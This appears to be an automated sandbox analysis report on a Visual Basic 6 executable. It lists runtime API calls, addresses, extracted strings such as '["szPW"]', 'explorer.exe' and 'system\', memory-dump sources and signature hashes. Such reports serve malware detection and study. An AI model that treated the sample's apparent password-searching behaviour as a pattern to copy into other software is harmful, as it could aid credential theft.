Part of subcall function 004296C0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CAFD,0042C0D4), ref: 004296DE
Part of subcall function 004296C0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042970E
Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429723
Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 0042973D
Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(00000000,?,?,?,00000000,004032B6), ref: 00429744
Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042974F
Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(explorer.exe, ,00000000,?,?,?,00000000,004032B6), ref: 00429761
Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042976C
Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429779
Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429784
Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429792
Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 004297A0
Part of subcall function 004296C0: __vbaFreeStrList.MSVBVM60(00000007,?,?,?,00000000,?,?,?,00000000,?,?,?,?,00000000), ref: 004297D9

__vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,?,Function_000032B6), ref: 0040DD2F
__vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128), ref: 0040DD69
__vbaSetSystemError.MSVBVM60(?,00000000), ref: 0040DD7F
__vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?), ref: 0040DD98
#525.MSVBVM60(00000104), ref: 0040DDC1
__vbaStrMove.MSVBVM60 ref: 0040DDCC
__vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 0040DE03
__vbaGenerateBoundsError.MSVBVM60 ref: 0040DE42
__vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 0040DE5D
__vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 0040DE83
__vbaStrToUnicode.MSVBVM60(?,?), ref: 0040DE94
__vbaFreeStr.MSVBVM60 ref: 0040DEA9
#616.MSVBVM60(?,?), ref: 0040DEBE
__vbaStrMove.MSVBVM60 ref: 0040DECC
__vbaStrMove.MSVBVM60(?), ref: 0040DEE6
#517.MSVBVM60(00000000), ref: 0040DEED
__vbaStrMove.MSVBVM60 ref: 0040DEF8
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040DF0E
__vbaLenBstr.MSVBVM60(?,?,?,Function_000032B6), ref: 0040DF22
__vbaStrCmp.MSVBVM60(00000000,?,?,?,Function_000032B6), ref: 0040DF58
__vbaStrCopy.MSVBVM60(?,?,Function_000032B6), ref: 0040DFC0
__vbaStrMove.MSVBVM60(?,?,?,Function_000032B6), ref: 0040DFDA
__vbaStrMove.MSVBVM60(?,00000000,?,?,Function_000032B6), ref: 0040DFF5
__vbaStrCmp.MSVBVM60(00000000,?,?,Function_000032B6), ref: 0040DFFC
__vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,?,Function_000032B6), ref: 0040E027
__vbaStrCopy.MSVBVM60 ref: 0040E04A
__vbaStrCmp.MSVBVM60(00000000,?,?,?,Function_000032B6), ref: 0040E064
__vbaRecUniToAnsi.MSVBVM60(00405598,?,?,?,?,Function_000032B6), ref: 0040E0AB
__vbaSetSystemError.MSVBVM60(?,00000000,?,?,Function_000032B6), ref: 0040E0C1
__vbaRecAnsiToUni.MSVBVM60(00405598,?,?,?,?,Function_000032B6), ref: 0040E0DA
__vbaSetSystemError.MSVBVM60(?), ref: 0040E0FE
#580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0E4,00000000), ref: 0040E182
__vbaStrCat.MSVBVM60( SE,00000000,00000000), ref: 0040E19B
#600.MSVBVM60(00000008,00000000), ref: 0040E1BA
__vbaFreeVar.MSVBVM60 ref: 0040E1CC
#580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0E4,00000000), ref: 0040E242
__vbaStrCat.MSVBVM60( PR,00000000,00000000), ref: 0040E25A
#600.MSVBVM60(00000008,00000000), ref: 0040E279
__vbaFreeVar.MSVBVM60 ref: 0040E28B

Part of subcall function 00415AF0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CB29,0042C0F4,00000000,0042C0D4), ref: 00415B0E
Part of subcall function 00415AF0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00415B3E
Part of subcall function 00415AF0: #580.MSVBVM60(00000000,00000000,00000000,?,?,?,00000000,004032B6), ref: 00415B6A
Part of subcall function 00415AF0: #529.MSVBVM60(00004008), ref: 00415B88

Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60(72A47559,00000000,00000000), ref: 00425A0A
Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A12
Part of subcall function 004259A0: __vbaOnError.MSVBVM60(00000001), ref: 00425A16
Part of subcall function 004259A0: #648.MSVBVM60(0000000A), ref: 00425A2E
Part of subcall function 004259A0: __vbaFreeVar.MSVBVM60 ref: 00425A3D
Part of subcall function 004259A0: __vbaI2I4.MSVBVM60(?), ref: 00425A4F
Part of subcall function 004259A0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00425A59
Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425A61
Part of subcall function 004259A0: #570.MSVBVM60(00000000), ref: 00425A64
Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425A74
Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A93
Part of subcall function 004259A0: __vbaStrMove.MSVBVM60(?), ref: 00425AA9
Part of subcall function 004259A0: __vbaFreeStr.MSVBVM60 ref: 00425AAE
Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425AC2
Part of subcall function 004259A0: #525.MSVBVM60(00000000), ref: 00425AC9
Part of subcall function 004259A0: __vbaStrMove.MSVBVM60 ref: 00425AD4
Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425AD9
Part of subcall function 004259A0: __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 00425AE3

#598.MSVBVM60 ref: 0040E298
__vbaFreeStr.MSVBVM60(0040E305), ref: 0040E2DD
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0040E2F5
__vbaFreeStr.MSVBVM60 ref: 0040E2FE

Part of subcall function 0041A090: __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0041A0AE
Part of subcall function 0041A090: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041A0DE
Part of subcall function 0041A090: __vbaSetSystemError.MSVBVM60(001F03FF,00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041A118
Part of subcall function 0041A090: __vbaSetSystemError.MSVBVM60(00000000), ref: 0041A141
Part of subcall function 0041A090: __vbaSetSystemError.MSVBVM60(00000000), ref: 0041A157

Part of subcall function 004228E0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CB10,00000000,0042C0D4), ref: 004228FE
Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042292B
Part of subcall function 004228E0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042293A
Part of subcall function 004228E0: #648.MSVBVM60(0000000A), ref: 00422959
Part of subcall function 004228E0: __vbaFreeVar.MSVBVM60 ref: 00422968
Part of subcall function 004228E0: __vbaI2I4.MSVBVM60(?), ref: 0042297C
Part of subcall function 004228E0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0042298A
Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 0042299A
Part of subcall function 004228E0: #570.MSVBVM60(00000000), ref: 004229A1
Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229AE
Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229E5
Part of subcall function 004228E0: #525.MSVBVM60(00000000), ref: 004229EC
Part of subcall function 004228E0: __vbaStrMove.MSVBVM60 ref: 004229F7
Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A07
Part of subcall function 004228E0: __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 00422A12
Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A22
Part of subcall function 004228E0: __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00422A2F
Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(?), ref: 00422A4A
Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60 ref: 00422A68
Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(00000003), ref: 00422A79
Part of subcall function 004228E0: #616.MSVBVM60(00000000), ref: 00422A80

Strings

SE, xrefs: 0040E196
>, xrefs: 0040E291
PR, xrefs: 0040E255

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Error$FreeMoveSystem$Copy$Ansi$Chkstk$Bstr$#525#580FileListUnicode$#570#600#616#648Open$#517#529#598BoundsConstruct2DestructGenerateGet3Get4Seek
String ID: PR$ SE$>
API String ID: 1583011778-1191765531
Opcode ID: 45859f09e341b6f6bdbc91610b05257dc4f75515ba4226435016caa82a9c69b6
Instruction ID: f905f382651ed8b103fe9430cada2d1d943483e90bd52cba87cb48a71c5da37b
Opcode Fuzzy Hash: 45859f09e341b6f6bdbc91610b05257dc4f75515ba4226435016caa82a9c69b6
Instruction Fuzzy Hash: F7122D75A01219EBDB14DFA0DE88BDE7BB4FF48304F1081A9E505B72A0DB785A85CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041BDC7, Relevance: 91.3, APIs: 49, Strings: 3, Instructions: 299COMMON

Download Yara Rule

APIs

__vbaGenerateBoundsError.MSVBVM60 ref: 0041BE27
__vbaGenerateBoundsError.MSVBVM60 ref: 0041BE44
__vbaStrCat.MSVBVM60(00000000,?), ref: 0041BE64
__vbaStrMove.MSVBVM60 ref: 0041BE72
__vbaStrCat.MSVBVM60(00406544,00000000), ref: 0041BE7E
__vbaStrMove.MSVBVM60 ref: 0041BE89
__vbaFreeStr.MSVBVM60 ref: 0041BE95
__vbaRecUniToAnsi.MSVBVM60(004055BC,?,?), ref: 0041BEB5
__vbaStrCat.MSVBVM60(*.dat,?,00000000), ref: 0041BEC5
__vbaStrMove.MSVBVM60 ref: 0041BED3
__vbaStrToAnsi.MSVBVM60(?,00000000), ref: 0041BEE1
__vbaSetSystemError.MSVBVM60(00000000), ref: 0041BEF3
__vbaRecAnsiToUni.MSVBVM60(004055BC,?,?), ref: 0041BF0C
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041BF2B
__vbaStrFixstr.MSVBVM60(00000104,?), ref: 0041BF58
__vbaStrMove.MSVBVM60 ref: 0041BF66
__vbaStrMove.MSVBVM60(00000000), ref: 0041BF7A
__vbaLsetFixstr.MSVBVM60(00000104,?,?), ref: 0041BF93
__vbaStrMove.MSVBVM60 ref: 0041BFB8
__vbaFreeStr.MSVBVM60 ref: 0041BFC4
__vbaStrCat.MSVBVM60(?,?), ref: 0041BFD9
__vbaStrMove.MSVBVM60 ref: 0041BFE7
#578.MSVBVM60(00000000), ref: 0041BFEE
__vbaFreeStr.MSVBVM60 ref: 0041C00D
__vbaStrCat.MSVBVM60(?,?), ref: 0041C031
__vbaStrMove.MSVBVM60 ref: 0041C03F
__vbaStrMove.MSVBVM60(?), ref: 0041C056
__vbaFreeStr.MSVBVM60 ref: 0041C062
__vbaInStr.MSVBVM60(00000000,["szPW"],?,00000001), ref: 0041C07C
__vbaInStr.MSVBVM60(00000000,004095E4,?,-00000008), ref: 0041C0B5
__vbaInStr.MSVBVM60(00000000,004095E4,?,-00000001), ref: 0041C0EE
__vbaStrCopy.MSVBVM60 ref: 0041C353
__vbaFreeStr.MSVBVM60(0041C3F0), ref: 0041C3B0
__vbaFreeStr.MSVBVM60 ref: 0041C3B9
__vbaFreeStr.MSVBVM60 ref: 0041C3C2
__vbaFreeStr.MSVBVM60 ref: 0041C3CB
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041C3D7
__vbaFreeStr.MSVBVM60 ref: 0041C3E0
__vbaFreeStr.MSVBVM60 ref: 0041C3E9
__vbaErrorOverflow.MSVBVM60 ref: 0041C406

Strings

59ABCQEF01, xrefs: 0041C236
*.dat, xrefs: 0041BEC0
["szPW"], xrefs: 0041C075

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$Error$Ansi$BoundsFixstrGenerate$#578CopyDestructListLsetOverflowSystem
String ID: *.dat$59ABCQEF01$["szPW"]
API String ID: 806118442-2789598873
Opcode ID: a5ac6cd11d6c4d803174f6a91ff4b35df35804981069048ccf288ae3b20bb73f
Instruction ID: e520ffca7d995d5c9d8e1e4b7866a297511e66e05a072c8871b128296ca8dfb1
Opcode Fuzzy Hash: a5ac6cd11d6c4d803174f6a91ff4b35df35804981069048ccf288ae3b20bb73f
Instruction Fuzzy Hash: 78D10C71A00258EFDB14DFA0DE88BDEB775EB48301F1081A9E50AB72A0DB745E85CF19

Uniqueness

Uniqueness Score: -1.00%

Function 0041A980, Relevance: 75.5, APIs: 35, Strings: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041A99E
__vbaStrCopy.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0041A9CE
__vbaAryConstruct2.MSVBVM60(?,00408078,00000003,?,00000000,?,00000000,Function_000032B6), ref: 0041A9DF
__vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,Function_000032B6), ref: 0041A9EE
__vbaSetSystemError.MSVBVM60(0000000F,00000000,?,00000000,?,00000000,Function_000032B6), ref: 0041AA0A
__vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128), ref: 0041AA44
__vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041AA5A
__vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?), ref: 0041AA73
#525.MSVBVM60(00000104), ref: 0041AA9C
__vbaStrMove.MSVBVM60 ref: 0041AAA7
__vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 0041AADE
__vbaGenerateBoundsError.MSVBVM60 ref: 0041AB1D
__vbaStrToAnsi.MSVBVM60(?,00000000,000001F4), ref: 0041AB38
__vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041AB5E
__vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000), ref: 0041AB6F
__vbaFreeStr.MSVBVM60(?,00000000), ref: 0041AB84
#616.MSVBVM60(00000000,?,?,00000000), ref: 0041AB99
__vbaStrMove.MSVBVM60(?,00000000), ref: 0041ABA7
__vbaStrMove.MSVBVM60(?,?,00000000), ref: 0041ABBE
__vbaFreeStr.MSVBVM60(?,00000000), ref: 0041ABCA
#517.MSVBVM60(?,?,00000000), ref: 0041ABDB
__vbaStrMove.MSVBVM60(?,00000000), ref: 0041ABE9
#517.MSVBVM60(?,00000000,?,00000000), ref: 0041ABF7
__vbaStrMove.MSVBVM60(?,00000000), ref: 0041AC05
__vbaStrCmp.MSVBVM60(00000000,?,00000000), ref: 0041AC0C
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 0041AC30
__vbaRecUniToAnsi.MSVBVM60(00405598,?,?,?,00000000,Function_000032B6), ref: 0041AC77
__vbaSetSystemError.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0041AC8D
__vbaRecAnsiToUni.MSVBVM60(00405598,?,?,?,00000000,Function_000032B6), ref: 0041ACA6
__vbaSetSystemError.MSVBVM60(?), ref: 0041ACCA
__vbaFreeStr.MSVBVM60(0041AD37), ref: 0041AD03
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041AD1B
__vbaFreeStr.MSVBVM60 ref: 0041AD24
__vbaFreeStr.MSVBVM60 ref: 0041AD30

Strings

system\, xrefs: 0041AFA8, 0041B1B7, 0041B2C6, 0041B763
yymmdd, xrefs: 0041B6CE
d/m/yy h:m, xrefs: 0041B435
59ABCQEF01, xrefs: 0041C236
*.dat, xrefs: 0041BEC0
+, xrefs: 0041BA22
["szPW"], xrefs: 0041C075
00000, xrefs: 0041B720

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Error$FreeSystem$AnsiMove$#517$#525#616BoundsChkstkConstruct2CopyDestructGenerateListUnicode
String ID: *.dat$+$00000$59ABCQEF01$["szPW"]$d/m/yy h:m$system\$yymmdd
API String ID: 3648932012-3366732667
Opcode ID: 7668726f4cd95b987f5e59ec2b7e3e1321d326a0ceac46527a88094c400bc5a0
Instruction ID: 2d0d5c7510d645d02d0112559b502ebe2581ea1b8a188934723facc0c59fc7af
Opcode Fuzzy Hash: 7668726f4cd95b987f5e59ec2b7e3e1321d326a0ceac46527a88094c400bc5a0
Instruction Fuzzy Hash: 03A11875901219EBDB10DFA0DE48BDEBBB4FB48305F1081A9E50AB72A0DB745A84CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004190D0, Relevance: 73.7, APIs: 30, Strings: 12, Instructions: 179COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 004190EE
__vbaStrCopy.MSVBVM60(00000000,?,?,00000000,Function_000032B6), ref: 0041911B
__vbaOnError.MSVBVM60(000000FF), ref: 0041912A
#618.MSVBVM60(?,00000004), ref: 0041913D
__vbaStrMove.MSVBVM60 ref: 00419148
#517.MSVBVM60(00000000), ref: 0041914F
__vbaStrMove.MSVBVM60 ref: 0041915A
__vbaFreeStr.MSVBVM60 ref: 00419163
__vbaStrCmp.MSVBVM60(.png,?), ref: 00419179
__vbaStrCopy.MSVBVM60 ref: 00419192
__vbaStrCmp.MSVBVM60(.gif,?), ref: 004191AD
__vbaStrCopy.MSVBVM60 ref: 004191C6
__vbaSetSystemError.MSVBVM60(?,00000000,?), ref: 004192FA
#644.MSVBVM60(?,?,?), ref: 0041932B
__vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 0041934A
__vbaSetSystemError.MSVBVM60(?,?,?), ref: 0041936F
__vbaFreeStr.MSVBVM60(004193A2), ref: 00419389
__vbaFreeStr.MSVBVM60 ref: 00419392
__vbaFreeStr.MSVBVM60 ref: 0041939B

Strings

image/gif, xrefs: 004191BE
jpeg, xrefs: 00419210
.bmp, xrefs: 004192A6
.tif, xrefs: 00419244
image/jpeg, xrefs: 004191F2, 00419226, 004192D3
.png, xrefs: 00419174
image/png, xrefs: 0041918A
image/tiff, xrefs: 0041925A, 0041928B
tiff, xrefs: 00419275
.gif, xrefs: 004191A8
.jpg, xrefs: 004191DC
image/bmp, xrefs: 004192BC

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$ErrorFree$CopySystem$Move$#517#618#644Chkstk
String ID: .bmp$.gif$.jpg$.png$.tif$image/bmp$image/gif$image/jpeg$image/png$image/tiff$jpeg$tiff
API String ID: 1021285327-184555114
Opcode ID: ba1cf2ca1d92ba703dd7003ebc9d02931437add039b3899e3393abdce3672aa7
Instruction ID: 18cdca4dd913881e1e3906aabc5795d02bdbdb37ff3be22054c062f985fa0cbb
Opcode Fuzzy Hash: ba1cf2ca1d92ba703dd7003ebc9d02931437add039b3899e3393abdce3672aa7
Instruction Fuzzy Hash: 48710CB1900209EBDB04DFE1DA59BEEBB74FB44304F20806DE502B76A0D7785E45DB18

Uniqueness

Uniqueness Score: -1.00%

Function 00426070, Relevance: 64.8, APIs: 43, Instructions: 350COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(72A21A08,00000000,72A26C4A), ref: 004260E5
__vbaStrCopy.MSVBVM60 ref: 004260ED
__vbaOnError.MSVBVM60(00000001), ref: 004260F1
__vbaStrToAnsi.MSVBVM60(?,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00426110
__vbaSetSystemError.MSVBVM60(00000000), ref: 00426121
__vbaStrToUnicode.MSVBVM60(?,?), ref: 0042612B
__vbaFreeStr.MSVBVM60 ref: 0042613A
__vbaSetSystemError.MSVBVM60(?,00000000,?,00000000,?), ref: 0042616D
__vbaSetSystemError.MSVBVM60(?,?,00000006,?,00000000), ref: 00426183
__vbaSetSystemError.MSVBVM60(?,?,00000010,?,00000000), ref: 00426199
__vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 004261B0
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 004261C6
__vbaAryLock.MSVBVM60(?,?), ref: 004261D7
__vbaGenerateBoundsError.MSVBVM60 ref: 004261F4
__vbaGenerateBoundsError.MSVBVM60 ref: 00426203
__vbaSetSystemError.MSVBVM60(?,3F800000,?,?,00000000), ref: 00426224
__vbaAryUnlock.MSVBVM60(?), ref: 0042622A
__vbaSetSystemError.MSVBVM60(?), ref: 00426239
__vbaStrToAnsi.MSVBVM60(?,?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 0042624E
__vbaSetSystemError.MSVBVM60(00000000), ref: 00426259
__vbaStrToUnicode.MSVBVM60(?,?), ref: 00426263
__vbaFreeStr.MSVBVM60 ref: 00426272
__vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?), ref: 004262D8
__vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?), ref: 004262EB
__vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 0042630A
__vbaAryLock.MSVBVM60(?,?), ref: 00426314
__vbaGenerateBoundsError.MSVBVM60 ref: 00426331
__vbaGenerateBoundsError.MSVBVM60 ref: 00426339
__vbaUbound.MSVBVM60(00000001,?,?,00000000), ref: 0042634D
__vbaSetSystemError.MSVBVM60(?,3F800000,00000000), ref: 00426366
__vbaAryUnlock.MSVBVM60(?), ref: 00426372
__vbaAryLock.MSVBVM60(?,?), ref: 0042637C
__vbaGenerateBoundsError.MSVBVM60 ref: 0042639C
__vbaGenerateBoundsError.MSVBVM60 ref: 004263AD
__vbaAryUnlock.MSVBVM60(?,?,?,3F800004,?), ref: 004263D5
__vbaSetSystemError.MSVBVM60(?), ref: 004263E5
__vbaExitProc.MSVBVM60 ref: 004263EE
__vbaSetSystemError.MSVBVM60(?,?), ref: 00426410
__vbaExitProc.MSVBVM60 ref: 00426419
__vbaFreeStr.MSVBVM60(00426466), ref: 00426443
__vbaRecDestruct.MSVBVM60(00407F10,?), ref: 0042644E
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042645A
__vbaFreeStr.MSVBVM60 ref: 00426463

Part of subcall function 00426480: __vbaSetSystemError.MSVBVM60(00000000,?,00000006,?,00000000,?,00426152,?), ref: 004264B4

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Error$System$BoundsGenerate$Free$LockUnlock$AnsiCopyDestructExitProcUnicode$RedimUbound
String ID:
API String ID: 2812220623-0
Opcode ID: 4bff154d9429e66b7277ffeb6f82d5934f284739e9e3ccb96d97e83057302d16
Instruction ID: 6d216b33ba202ac5a5f4cc22896228a38d21b0d4e91878a3c687a56ceed05745
Opcode Fuzzy Hash: 4bff154d9429e66b7277ffeb6f82d5934f284739e9e3ccb96d97e83057302d16
Instruction Fuzzy Hash: D7D12A71E00218ABCB04EFE5ED84DEEBBB9BF88704F50411EF505A7254DB74A942CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00420670, Relevance: 61.8, APIs: 41, Instructions: 261COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(?,00000000,00000000), ref: 004206C8
__vbaStrCopy.MSVBVM60(?,00000000), ref: 004206D0
__vbaOnError.MSVBVM60(00000001), ref: 004206D4
#648.MSVBVM60(0000000A), ref: 004206EC
__vbaFreeVar.MSVBVM60(?,00000000), ref: 004206FB
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000000,?), ref: 00420714
__vbaLenBstr.MSVBVM60(00405414), ref: 0042071F
#525.MSVBVM60(00000000), ref: 00420726
__vbaStrMove.MSVBVM60(?,00000000), ref: 00420737
__vbaGet3.MSVBVM60(00000000,?,00000000), ref: 0042074B
__vbaStrCopy.MSVBVM60(?,00000000), ref: 00420755

Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713

__vbaStrMove.MSVBVM60(?), ref: 00420765

Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877

__vbaStrMove.MSVBVM60(?,00000000), ref: 00420776
__vbaStrCmp.MSVBVM60(00000000), ref: 00420779
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00420797
__vbaGet3.MSVBVM60(00000004,?,00000000), ref: 004207C6
__vbaLenBstr.MSVBVM60(00405414), ref: 004207CD
__vbaGet3.MSVBVM60(00000004,0042C250,00000000), ref: 00420815
#525.MSVBVM60(00000000), ref: 0042081E
__vbaStrMove.MSVBVM60 ref: 0042082B
__vbaGet3.MSVBVM60(00000000,0042C254,00000000), ref: 0042083C
__vbaGet3.MSVBVM60(00000004,0042C1C0,00000000), ref: 0042084C
__vbaStrCopy.MSVBVM60 ref: 00420861
#648.MSVBVM60(0000000A), ref: 00420879
__vbaFreeVar.MSVBVM60 ref: 00420888
__vbaStrCat.MSVBVM60(00000000,?), ref: 00420899
__vbaStrMove.MSVBVM60 ref: 004208A4
__vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,00000000), ref: 004208B6
__vbaFreeStr.MSVBVM60 ref: 004208BF
__vbaGenerateBoundsError.MSVBVM60 ref: 004208E1
__vbaUI1I2.MSVBVM60 ref: 004208EC
__vbaUI1I2.MSVBVM60 ref: 00420918
__vbaUI1I2.MSVBVM60 ref: 00420922

Memory Dump Source

